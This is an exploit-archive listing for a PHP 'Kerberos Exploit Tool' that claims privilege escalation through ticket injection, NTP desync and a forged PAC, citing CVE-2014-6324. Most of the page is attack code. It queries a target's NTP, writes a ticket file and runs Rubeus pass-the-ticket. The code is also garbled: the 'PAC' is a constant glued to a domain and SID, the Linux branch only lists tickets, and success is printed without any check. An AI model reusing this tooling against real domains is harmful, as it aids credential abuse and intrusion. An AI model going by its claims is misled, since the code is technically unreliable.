Share
## https://sploitus.com/exploit?id=PACKETSTORM:189632
=============================================================================================================================================
| # Title : Kerberos V5-1.21.3 Privilege Escalation & Ticket Injection Tool Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://web.mit.edu/kerberos/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: This code is written in PHP and aims to perform attacks on Kerberos via Ticket Injection and NTP Desync exploits. The code runs on Windows and Linux.
(Related : https://packetstorm.news/files/id/180752/ Linked CVE numbers: CVE-2014-6324 ) .
[+] save code as poc.php.
[+] Set target : line 66
[+] PayLoad :
<?php
// Kerberos Exploit Tool
// Supports Windows & Linux
// Features: NTP desync, PAC manipulation, RC4-HMAC bypass, Ticket Injection
// Author: Indoushka
function check_os() {
if (stripos(PHP_OS, 'WIN') !== false) {
return "Windows";
} elseif (stripos(PHP_OS, 'Linux') !== false) {
return "Linux";
} else {
die("[!] Unsupported OS\n");
}
}
// NTP Desync Exploit
function check_ntp_sync($target) {
$output = shell_exec("ntpq -p " . escapeshellarg($target) . " 2>&1");
if ($output === null) {
echo "[!] Failed to execute NTP query.\n";
return;
}
if (strpos(strtolower($output), "unsynchronized") !== false) {
echo "[*] Target NTP is desynchronized - Possible Exploit!\n";
} else {
echo "[-] Target is synchronized - Harder to exploit.\n";
}
}
// Kerberos Ticket Injection
function inject_ticket($ticket_data) {
$os = check_os();
if ($os == "Windows") {
$ticket_path = "C:\\Windows\\Temp\\ticket.kirbi";
file_put_contents($ticket_path, $ticket_data);
$result = shell_exec("rubeus.exe ptt /ticket:" . escapeshellarg($ticket_path) . " 2>&1");
} else {
putenv("KRB5CCNAME=/tmp/krb5cc_0");
$ticket_path = "/tmp/krb5cc_0";
file_put_contents($ticket_path, $ticket_data);
$result = shell_exec("klist -c " . escapeshellarg($ticket_path) . " 2>&1");
}
if ($result === null) {
echo "[!] Ticket injection failed.\n";
} else {
echo "[+] Ticket successfully injected.\n";
}
}
// Generate Fake PAC
function generate_pac($user_sid, $domain) {
return pack("V", 0x00020000) . $domain . $user_sid;
}
// Main Exploit Function
function kerberos_exploit($target, $username, $password, $domain, $user_sid) {
echo "[*] Targeting $target in domain $domain\n";
check_ntp_sync($target);
$pac = generate_pac($user_sid, $domain);
inject_ticket($pac);
echo "[+] Exploit completed. Check your privileges!\n";
}
// Example Usage
$target_ip = "192.168.1.100";
$user = "victim";
$pwd = "password123";
$domain_name = "DEMO.LOCAL";
$user_sid = "S-1-5-21-1234567890-1234567890-1234567890-1000";
kerberos_exploit($target_ip, $user, $pwd, $domain_name, $user_sid);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================